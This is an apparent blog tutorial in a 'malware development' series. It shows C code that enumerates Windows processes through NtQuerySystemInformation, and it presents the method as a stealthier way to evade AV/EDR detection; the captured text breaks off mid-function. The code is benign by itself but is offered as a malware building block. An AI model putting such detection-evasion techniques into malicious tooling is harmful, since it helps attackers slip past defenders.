Malware development trick 55: enum process via NtQuerySystemInformation. Simple C example.

cocomelonc.github.io · cocomelonc · 3 months ago · tutorial
quality 7/10 · good
0 net
Tags
malware-development enum-processes system-information
Malware development trick 55: enum process via NtQuerySystemInformation. Simple C example. - cocomelonc You are using an outdated browser. Please upgrade your browser to improve your experience. cocomelonc cybersec enthusiast. mathematician. author. speaker. hacker Follow Istanbul Email Twitter GitHub LinkedIn Custom Social Profile Link --> ﷽ Hello, cybersecurity enthusiasts and white hackers! In one of my early posts , I demonstrated how to find a process ID using the standard CreateToolhelp32Snapshot API. While effective, it is a very common technique that is heavily monitored by AV/EDR solutions and detected via malware analysts. Another the biggest issue here is performance! Today, we will look at a more “stealthy” and lower-level approach: using the undocumented (or semi-documented) NtQuerySystemInformation function from ntdll.dll . NtQuerySystemInformation Function NtQuerySystemInformation is a powerful function in the Windows Native API that allows a caller to retrieve various types of system information. __kernel_entry NTSTATUS NtQuerySystemInformation ( [ in ] SYSTEM_INFORMATION_CLASS SystemInformationClass , [ in , out ] PVOID SystemInformation , [ in ] ULONG SystemInformationLength , [ out , optional ] PULONG ReturnLength ); Please, note the first line in the documentation! [NtQuerySystemInformation may be altered or unavailable in future versions of Windows. Applications should use the alternate functions listed in this topic.] WTF??? ok. To enumerate processes, we use the SystemProcessInformation class. This returns a buffer containing a sequence of SYSTEM_PROCESS_INFORMATION structures, one for each process running on the system. practical example First of all we need to resolve the API. Since NtQuerySystemInformation is not exported by standard headers in a way that’s easy to use, we manually get its address from ntdll.dll using GetProcAddress : // typedef NtQuerySystemInformation typedef NTSTATUS ( NTAPI * fnNtQuerySystemInformation )( SYSTEM_INFORMATION_CLASS SystemInformationClass , PVOID SystemInformation , ULONG SystemInformationLength , PULONG ReturnLength ); //... pNtQuerySystemInformation = ( fnNtQuerySystemInformation ) GetProcAddress ( GetModuleHandle ( "ntdll.dll" ), "NtQuerySystemInformation" ); Then determine buffer size. We don’t know how much memory we need for all process structures. We call the function once with a NULL buffer. It will fail, but it will return the required length in ReturnLength . // get buffer size pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , NULL , 0 , & uReturnLen ); Then we allocate the required buffer on the heap: // allocate memory SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , ( SIZE_T ) uReturnLen ); if ( SystemProcInfo == NULL ) { HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } pValueToFree = SystemProcInfo ; And we call the function a second time with the allocated buffer. // get information about processes STATUS = pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , SystemProcInfo , uReturnLen , & uReturnLen ); if ( STATUS != 0 ) { HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } Finally just enum and compare. The data is a linked list of sorts, where each structure points to the next one via NextEntryOffset . We compare our target process name with the ImageName.Buffer in each structure: // enum while ( TRUE ) { if ( SystemProcInfo -> ImageName . Length && SystemProcInfo -> ImageName . Buffer ) { if ( wcscmp ( SystemProcInfo -> ImageName . Buffer , szTargetProc ) == 0 ) { pid = ( int )( ULONG_PTR ) SystemProcInfo -> UniqueProcessId ; break ; } } if ( ! SystemProcInfo -> NextEntryOffset ) break ; SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION )(( ULONG_PTR ) SystemProcInfo + SystemProcInfo -> NextEntryOffset ); } Free the heap memory and return the PID: // cleanup HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return pid ; One important detail: the process names inside the kernel are stored as UNICODE_STRING (WideChar) . Since our input is usually an ANSI string ( char* ), we must convert it using MultiByteToWideChar before comparing: // convert ANSI to WideChar (LPCWSTR) for comparsion int nLen = MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , NULL , 0 ); WCHAR * szTargetProc = ( WCHAR * ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , nLen * sizeof ( WCHAR )); if ( szTargetProc == NULL ) return 0 ; MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , szTargetProc , nLen ); Full source code is looks like the following ( hack.c ): /* * hack.c * process enum via NtQuerySystemInformation * author: @cocomelonc * https://cocomelonc.github.io/malware/2025/12/26/malware-trick-55.html */ #include #include typedef struct _UNICODE_STRING { USHORT Length ; USHORT MaximumLength ; PWSTR Buffer ; } UNICODE_STRING , * PUNICODE_STRING ; // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1324 typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemProcessorInformation , // q: SYSTEM_PROCESSOR_INFORMATION SystemPerformanceInformation , // q: SYSTEM_PERFORMANCE_INFORMATION SystemTimeOfDayInformation , // q: SYSTEM_TIMEOFDAY_INFORMATION SystemPathInformation , // not implemented SystemProcessInformation , // q: SYSTEM_PROCESS_INFORMATION SystemCallCountInformation , // q: SYSTEM_CALL_COUNT_INFORMATION SystemDeviceInformation , // q: SYSTEM_DEVICE_INFORMATION SystemProcessorPerformanceInformation , // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION (EX in: USHORT ProcessorGroup) SystemFlagsInformation , // q: SYSTEM_FLAGS_INFORMATION SystemCallTimeInformation , // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10 SystemModuleInformation , // q: RTL_PROCESS_MODULES SystemLocksInformation , // q: RTL_PROCESS_LOCKS SystemStackTraceInformation , // q: RTL_PROCESS_BACKTRACES SystemPagedPoolInformation , // not implemented SystemNonPagedPoolInformation , // not implemented SystemHandleInformation , // q: SYSTEM_HANDLE_INFORMATION SystemObjectInformation , // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION SystemPageFileInformation , // q: SYSTEM_PAGEFILE_INFORMATION SystemVdmInstemulInformation , // q: SYSTEM_VDM_INSTEMUL_INFO SystemVdmBopInformation , // not implemented // 20 SystemFileCacheInformation , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache) SystemPoolTagInformation , // q: SYSTEM_POOLTAG_INFORMATION SystemInterruptInformation , // q: SYSTEM_INTERRUPT_INFORMATION (EX in: USHORT ProcessorGroup) SystemDpcBehaviorInformation , // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege) SystemFullMemoryInformation , // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION SystemLoadGdiDriverInformation , // s (kernel-mode only) SystemUnloadGdiDriverInformation , // s (kernel-mode only) SystemTimeAdjustmentInformation , // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege) SystemSummaryMemoryInformation , // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION SystemMirrorMemoryInformation , // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30 SystemPerformanceTraceInformation , // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS) SystemObsolete0 , // not implemented SystemExceptionInformation , // q: SYSTEM_EXCEPTION_INFORMATION SystemCrashDumpStateInformation , // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege) SystemKernelDebuggerInformation , // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION SystemContextSwitchInformation , // q: SYSTEM_CONTEXT_SWITCH_INFORMATION SystemRegistryQuotaInformation , // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege) SystemExtendServiceTableInformation , // s (requires SeLoadDriverPrivilege) // loads win32k only SystemPrioritySeperation , // s (requires SeTcbPrivilege) SystemVerifierAddDriverInformation , // s (requires SeDebugPrivilege) // 40 SystemVerifierRemoveDriverInformation , // s (requires SeDebugPrivilege) SystemProcessorIdleInformation , // q: SYSTEM_PROCESSOR_IDLE_INFORMATION (EX in: USHORT ProcessorGroup) SystemLegacyDriverInformation , // q: SYSTEM_LEGACY_DRIVER_INFORMATION SystemCurrentTimeZoneInformation , // q; s: RTL_TIME_ZONE_INFORMATION SystemLookasideInformation , // q: SYSTEM_LOOKASIDE_INFORMATION SystemTimeSlipNotification , // s: HANDLE (NtCreateEvent) (requires SeSystemtimePrivilege) SystemSessionCreate , // not implemented SystemSessionDetach , // not implemented SystemSessionInformation , // not implemented (SYSTEM_SESSION_INFORMATION) SystemRangeStartInformation , // q: SYSTEM_RANGE_START_INFORMATION // 50 SystemVerifierInformation , // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege) SystemVerifierThunkExtend , // s (kernel-mode only) SystemSessionProcessInformation , // q: SYSTEM_SESSION_PROCESS_INFORMATION SystemLoadGdiDriverInSystemSpace , // s: SYSTEM_GDI_DRIVER_INFORMATION (kernel-mode only) (same as SystemLoadGdiDriverInformation) SystemNumaProcessorMap , // q: SYSTEM_NUMA_INFORMATION SystemPrefetcherInformation , // q; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation SystemExtendedProcessInformation , // q: SYSTEM_PROCESS_INFORMATION SystemRecommendedSharedDataAlignment , // q: ULONG // KeGetRecommendedSharedDataAlignment SystemComPlusPackage , // q; s: ULONG SystemNumaAvailableMemory , // q: SYSTEM_NUMA_INFORMATION // 60 SystemProcessorPowerInformation , // q: SYSTEM_PROCESSOR_POWER_INFORMATION (EX in: USHORT ProcessorGroup) SystemEmulationBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemEmulationProcessorInformation , // q: SYSTEM_PROCESSOR_INFORMATION SystemExtendedHandleInformation , // q: SYSTEM_HANDLE_INFORMATION_EX SystemLostDelayedWriteInformation , // q: ULONG SystemBigPoolInformation , // q: SYSTEM_BIGPOOL_INFORMATION SystemSessionPoolTagInformation , // q: SYSTEM_SESSION_POOLTAG_INFORMATION SystemSessionMappedViewInformation , // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION SystemHotpatchInformation , // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION SystemObjectSecurityMode , // q: ULONG // 70 SystemWatchdogTimerHandler , // s: SYSTEM_WATCHDOG_HANDLER_INFORMATION // (kernel-mode only) SystemWatchdogTimerInformation , // q: SYSTEM_WATCHDOG_TIMER_INFORMATION // (kernel-mode only) SystemLogicalProcessorInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION (EX in: USHORT ProcessorGroup) SystemWow64SharedInformationObsolete , // not implemented SystemRegisterFirmwareTableInformationHandler , // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only) SystemFirmwareTableInformation , // SYSTEM_FIRMWARE_TABLE_INFORMATION SystemModuleInformationEx , // q: RTL_PROCESS_MODULE_INFORMATION_EX SystemVerifierTriageInformation , // not implemented SystemSuperfetchInformation , // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation SystemMemoryListInformation , // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80 SystemFileCacheInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation) SystemThreadPriorityClientIdInformation , // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege) SystemProcessorIdleCycleTimeInformation , // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) SystemVerifierCancellationInformation , // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation SystemProcessorPowerInformationEx , // not implemented SystemRefTraceInformation , // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation SystemSpecialPoolInformation , // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0 SystemProcessIdInformation , // q: SYSTEM_PROCESS_ID_INFORMATION SystemErrorPortInformation , // s (requires SeTcbPrivilege) SystemBootEnvironmentInformation , // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90 SystemHypervisorInformation , // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION SystemVerifierInformationEx , // q; s: SYSTEM_VERIFIER_INFORMATION_EX SystemTimeZoneInformation , // q; s: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) SystemImageFileExecutionOptionsInformation , // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege) SystemCoverageInformation , // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege) SystemPrefetchPatchInformation , // SYSTEM_PREFETCH_PATCH_INFORMATION SystemVerifierFaultsInformation , // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege) SystemSystemPartitionInformation , // q: SYSTEM_SYSTEM_PARTITION_INFORMATION SystemSystemDiskInformation , // q: SYSTEM_SYSTEM_DISK_INFORMATION SystemProcessorPerformanceDistribution , // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // 100 SystemNumaProximityNodeInformation , // q; s: SYSTEM_NUMA_PROXIMITY_MAP SystemDynamicTimeZoneInformation , // q; s: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) SystemCodeIntegrityInformation , // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation SystemProcessorMicrocodeUpdateInformation , // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION SystemProcessorBrandString , // q: CHAR[] // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23 SystemVirtualAddressInformation , // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation SystemLogicalProcessorAndGroupInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // KeQueryLogicalProcessorRelationship SystemProcessorCycleTimeInformation , // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) SystemStoreInformation , // q; s: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation SystemRegistryAppendString , // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110 SystemAitSamplingValue , // s: ULONG (requires SeProfileSingleProcessPrivilege) SystemVhdBootInformation , // q: SYSTEM_VHD_BOOT_INFORMATION SystemCpuQuotaInformation , // q; s: PS_CPU_QUOTA_QUERY_INFORMATION SystemNativeBasicInformation , // q: SYSTEM_BASIC_INFORMATION SystemErrorPortTimeouts , // SYSTEM_ERROR_PORT_TIMEOUTS SystemLowPriorityIoInformation , // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION SystemTpmBootEntropyInformation , // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation SystemVerifierCountersInformation , // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION SystemPagedPoolInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool) SystemSystemPtesInformationEx , // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120 SystemNodeDistanceInformation , // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber) SystemAcpiAuditInformation , // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26 SystemBasicPerformanceInformation , // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation SystemQueryPerformanceCounterInformation , // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1 SystemSessionBigPoolInformation , // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8 SystemBootGraphicsInformation , // q; s: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only) SystemScrubPhysicalMemoryInformation , // q; s: MEMORY_SCRUB_INFORMATION SystemBadPageInformation , SystemProcessorProfileControlArea , // q; s: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA SystemCombinePhysicalMemoryInformation , // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130 SystemEntropyInterruptTimingInformation , // q; s: SYSTEM_ENTROPY_TIMING_INFORMATION SystemConsoleInformation , // q; s: SYSTEM_CONSOLE_INFORMATION SystemPlatformBinaryInformation , // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege) SystemPolicyInformation , // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute) SystemHypervisorProcessorCountInformation , // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION SystemDeviceDataInformation , // q: SYSTEM_DEVICE_DATA_INFORMATION SystemDeviceDataEnumerationInformation , // q: SYSTEM_DEVICE_DATA_INFORMATION SystemMemoryTopologyInformation , // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION SystemMemoryChannelInformation , // q: SYSTEM_MEMORY_CHANNEL_INFORMATION SystemBootLogoInformation , // q: SYSTEM_BOOT_LOGO_INFORMATION // 140 SystemProcessorPerformanceInformationEx , // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // since WINBLUE SystemCriticalProcessErrorLogInformation , SystemSecureBootPolicyInformation , // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION SystemPageFileInformationEx , // q: SYSTEM_PAGEFILE_INFORMATION_EX SystemSecureBootInformation , // q: SYSTEM_SECUREBOOT_INFORMATION SystemEntropyInterruptTimingRawInformation , SystemPortableWorkspaceEfiLauncherInformation , // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION SystemFullProcessInformation , // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin) SystemKernelDebuggerInformationEx , // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX SystemBootMetadataInformation , // 150 SystemSoftRebootInformation , // q: ULONG SystemElamCertificateInformation , // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION SystemOfflineDumpConfigInformation , // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 SystemProcessorFeaturesInformation , // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION SystemRegistryReconciliationInformation , // s: NULL (requires admin) (flushes registry hives) SystemEdidInformation , // q: SYSTEM_EDID_INFORMATION SystemManufacturingInformation , // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD SystemEnergyEstimationConfigInformation , // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION SystemHypervisorDetailInformation , // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION SystemProcessorCycleStatsInformation , // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION (EX in: USHORT ProcessorGroup) // 160 SystemVmGenerationCountInformation , SystemTrustedPlatformModuleInformation , // q: SYSTEM_TPM_INFORMATION SystemKernelDebuggerFlags , // SYSTEM_KERNEL_DEBUGGER_FLAGS SystemCodeIntegrityPolicyInformation , // q; s: SYSTEM_CODEINTEGRITYPOLICY_INFORMATION SystemIsolatedUserModeInformation , // q: SYSTEM_ISOLATED_USER_MODE_INFORMATION SystemHardwareSecurityTestInterfaceResultsInformation , SystemSingleModuleInformation , // q: SYSTEM_SINGLE_MODULE_INFORMATION SystemAllowedCpuSetsInformation , SystemVsmProtectionInformation , // q: SYSTEM_VSM_PROTECTION_INFORMATION (previously SystemDmaProtectionInformation) SystemInterruptCpuSetsInformation , // q: SYSTEM_INTERRUPT_CPU_SET_INFORMATION // 170 SystemSecureBootPolicyFullInformation , // q: SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION SystemCodeIntegrityPolicyFullInformation , SystemAffinitizedInterruptProcessorInformation , // (requires SeIncreaseBasePriorityPrivilege) SystemRootSiloInformation , // q: SYSTEM_ROOT_SILO_INFORMATION SystemCpuSetInformation , // q: SYSTEM_CPU_SET_INFORMATION // since THRESHOLD2 SystemCpuSetTagInformation , // q: SYSTEM_CPU_SET_TAG_INFORMATION SystemWin32WerStartCallout , SystemSecureKernelProfileInformation , // q: SYSTEM_SECURE_KERNEL_HYPERGUARD_PROFILE_INFORMATION SystemCodeIntegrityPlatformManifestInformation , // q: SYSTEM_SECUREBOOT_PLATFORM_MANIFEST_INFORMATION // since REDSTONE SystemInterruptSteeringInformation , // SYSTEM_INTERRUPT_STEERING_INFORMATION_INPUT // 180 SystemSupportedProcessorArchitectures , // p: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx SystemMemoryUsageInformation , // q: SYSTEM_MEMORY_USAGE_INFORMATION SystemCodeIntegrityCertificateInformation , // q: SYSTEM_CODEINTEGRITY_CERTIFICATE_INFORMATION SystemPhysicalMemoryInformation , // q: SYSTEM_PHYSICAL_MEMORY_INFORMATION // since REDSTONE2 SystemControlFlowTransition , // (Warbird/Encrypt/Decrypt/Execute) SystemKernelDebuggingAllowed , // s: ULONG SystemActivityModerationExeState , // SYSTEM_ACTIVITY_MODERATION_EXE_STATE SystemActivityModerationUserSettings , // SYSTEM_ACTIVITY_MODERATION_USER_SETTINGS SystemCodeIntegrityPoliciesFullInformation , SystemCodeIntegrityUnlockInformation , // SYSTEM_CODEINTEGRITY_UNLOCK_INFORMATION // 190 SystemIntegrityQuotaInformation , SystemFlushInformation , // q: SYSTEM_FLUSH_INFORMATION SystemProcessorIdleMaskInformation , // q: ULONG_PTR[ActiveGroupCount] // since REDSTONE3 SystemSecureDumpEncryptionInformation , SystemWriteConstraintInformation , // SYSTEM_WRITE_CONSTRAINT_INFORMATION SystemKernelVaShadowInformation , // SYSTEM_KERNEL_VA_SHADOW_INFORMATION SystemHypervisorSharedPageInformation , // SYSTEM_HYPERVISOR_SHARED_PAGE_INFORMATION // since REDSTONE4 SystemFirmwareBootPerformanceInformation , SystemCodeIntegrityVerificationInformation , // SYSTEM_CODEINTEGRITYVERIFICATION_INFORMATION SystemFirmwarePartitionInformation , // SYSTEM_FIRMWARE_PARTITION_INFORMATION // 200 SystemSpeculationControlInformation , // SYSTEM_SPECULATION_CONTROL_INFORMATION // (CVE-2017-5715) REDSTONE3 and above. SystemDmaGuardPolicyInformation , // SYSTEM_DMA_GUARD_POLICY_INFORMATION SystemEnclaveLaunchControlInformation , // SYSTEM_ENCLAVE_LAUNCH_CONTROL_INFORMATION SystemWorkloadAllowedCpuSetsInformation , // SYSTEM_WORKLOAD_ALLOWED_CPU_SET_INFORMATION // since REDSTONE5 SystemCodeIntegrityUnlockModeInformation , SystemLeapSecondInformation , // SYSTEM_LEAP_SECOND_INFORMATION SystemFlags2Information , // q: SYSTEM_FLAGS_INFORMATION SystemSecurityModelInformation , // SYSTEM_SECURITY_MODEL_INFORMATION // since 19H1 SystemCodeIntegritySyntheticCacheInformation , SystemFeatureConfigurationInformation , // SYSTEM_FEATURE_CONFIGURATION_INFORMATION // since 20H1 // 210 SystemFeatureConfigurationSectionInformation , // SYSTEM_FEATURE_CONFIGURATION_SECTIONS_INFORMATION SystemFeatureUsageSubscriptionInformation , // SYSTEM_FEATURE_USAGE_SUBSCRIPTION_DETAILS SystemSecureSpeculationControlInformation , // SECURE_SPECULATION_CONTROL_INFORMATION SystemSpacesBootInformation , // since 20H2 SystemFwRamdiskInformation , // SYSTEM_FIRMWARE_RAMDISK_INFORMATION SystemWheaIpmiHardwareInformation , SystemDifSetRuleClassInformation , SystemDifClearRuleClassInformation , SystemDifApplyPluginVerificationOnDriver , SystemDifRemovePluginVerificationOnDriver , // 220 SystemShadowStackInformation , // SYSTEM_SHADOW_STACK_INFORMATION SystemBuildVersionInformation , // SYSTEM_BUILD_VERSION_INFORMATION SystemPoolLimitInformation , // SYSTEM_POOL_LIMIT_INFORMATION (requires SeIncreaseQuotaPrivilege) SystemCodeIntegrityAddDynamicStore , SystemCodeIntegrityClearDynamicStores , SystemDifPoolTrackingInformation , SystemPoolZeroingInformation , // SYSTEM_POOL_ZEROING_INFORMATION SystemDpcWatchdogInformation , SystemDpcWatchdogInformation2 , SystemSupportedProcessorArchitectures2 , // q: in opt: HANDLE, out: SYSTEM_SUPPORTED_PROCESSOR_ARCHITECTURES_INFORMATION[] // NtQuerySystemInformationEx // 230 SystemSingleProcessorRelationshipInformation , // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // (EX in: PROCESSOR_NUMBER Processor) SystemXfgCheckFailureInformation , SystemIommuStateInformation , // SYSTEM_IOMMU_STATE_INFORMATION // since 22H1 SystemHypervisorMinrootInformation , // SYSTEM_HYPERVISOR_MINROOT_INFORMATION SystemHypervisorBootPagesInformation , // SYSTEM_HYPERVISOR_BOOT_PAGES_INFORMATION SystemPointerAuthInformation , // SYSTEM_POINTER_AUTH_INFORMATION SystemSecureKernelDebuggerInformation , SystemOriginalImageFeatureInformation , MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS ; // https://processhacker.sourceforge.io/doc/ntbasic_8h.html typedef LONG KPRIORITY ; // https://doxygen.reactos.org/da/df4/struct__SYSTEM__PROCESS__INFORMATION.html typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset ; ULONG NumberOfThreads ; LARGE_INTEGER WorkingSetPrivateSize ; //VISTA ULONG HardFaultCount ; //WIN7 ULONG NumberOfThreadsHighWatermark ; //WIN7 ULONGLONG CycleTime ; //WIN7 LARGE_INTEGER CreateTime ; LARGE_INTEGER UserTime ; LARGE_INTEGER KernelTime ; UNICODE_STRING ImageName ; KPRIORITY BasePriority ; HANDLE UniqueProcessId ; HANDLE InheritedFromUniqueProcessId ; ULONG HandleCount ; ULONG SessionId ; ULONG_PTR PageDirectoryBase ; SIZE_T PeakVirtualSize ; SIZE_T VirtualSize ; ULONG PageFaultCount ; SIZE_T PeakWorkingSetSize ; SIZE_T WorkingSetSize ; SIZE_T QuotaPeakPagedPoolUsage ; SIZE_T QuotaPagedPoolUsage ; SIZE_T QuotaPeakNonPagedPoolUsage ; SIZE_T QuotaNonPagedPoolUsage ; SIZE_T PagefileUsage ; SIZE_T PeakPagefileUsage ; SIZE_T PrivatePageCount ; LARGE_INTEGER ReadOperationCount ; LARGE_INTEGER WriteOperationCount ; LARGE_INTEGER OtherOperationCount ; LARGE_INTEGER ReadTransferCount ; LARGE_INTEGER WriteTransferCount ; LARGE_INTEGER OtherTransferCount ; // SYSTEM_THREAD_INFORMATION TH[1]; } SYSTEM_PROCESS_INFORMATION , * PSYSTEM_PROCESS_INFORMATION ; // typedef NtQuerySystemInformation typedef NTSTATUS ( NTAPI * fnNtQuerySystemInformation )( SYSTEM_INFORMATION_CLASS SystemInformationClass , PVOID SystemInformation , ULONG SystemInformationLength , PULONG ReturnLength ); int findMyProc ( const char * procName ) { fnNtQuerySystemInformation pNtQuerySystemInformation = NULL ; ULONG uReturnLen = 0 ; PSYSTEM_PROCESS_INFORMATION SystemProcInfo = NULL ; PVOID pValueToFree = NULL ; NTSTATUS STATUS = 0 ; int pid = 0 ; // get function address from ntdll pNtQuerySystemInformation = ( fnNtQuerySystemInformation ) GetProcAddress ( GetModuleHandle ( "ntdll.dll" ), "NtQuerySystemInformation" ); if ( pNtQuerySystemInformation == NULL ) return 0 ; // convert ANSI to WideChar (LPCWSTR) for comparsion int nLen = MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , NULL , 0 ); WCHAR * szTargetProc = ( WCHAR * ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , nLen * sizeof ( WCHAR )); if ( szTargetProc == NULL ) return 0 ; MultiByteToWideChar ( CP_ACP , 0 , procName , - 1 , szTargetProc , nLen ); // get buffer size pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , NULL , 0 , & uReturnLen ); // allocate memory SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION ) HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY , ( SIZE_T ) uReturnLen ); if ( SystemProcInfo == NULL ) { HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } pValueToFree = SystemProcInfo ; // get information about processes STATUS = pNtQuerySystemInformation (( SYSTEM_INFORMATION_CLASS ) 5 , SystemProcInfo , uReturnLen , & uReturnLen ); if ( STATUS != 0 ) { HeapFree ( GetProcessHeap (), 0 , pValueToFree ); HeapFree ( GetProcessHeap (), 0 , szTargetProc ); return 0 ; } // enum while ( TRUE ) { if ( SystemProcInfo -> ImageName . Length && SystemProcInfo -> ImageName . Buffer ) { if ( wcscmp ( SystemProcInfo -> ImageName . Buffer , szTargetProc ) == 0 ) { pid = ( int )( ULONG_PTR ) SystemProcInfo -> UniqueProcessId ; break ; } } if ( ! SystemProcInfo -> NextEntryOffset ) break ; SystemProcInfo = ( PSYSTEM_PROCESS_INFORMATION )(( ULONG_PTR ) SystemProcInfo + SystemProcInfo -> NextEntryOffset ); } // cleanup HeapFree ( GetProcessHeap (), 0 , pValueToFree 